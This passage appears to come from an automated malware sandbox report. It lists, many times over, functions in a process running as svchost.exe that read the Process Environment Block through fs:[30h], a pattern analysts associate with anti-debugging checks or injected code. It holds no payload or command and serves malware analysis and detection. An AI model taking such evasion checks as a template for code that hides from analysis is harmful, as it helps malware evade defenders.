            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]2_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]2_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]2_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]2_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
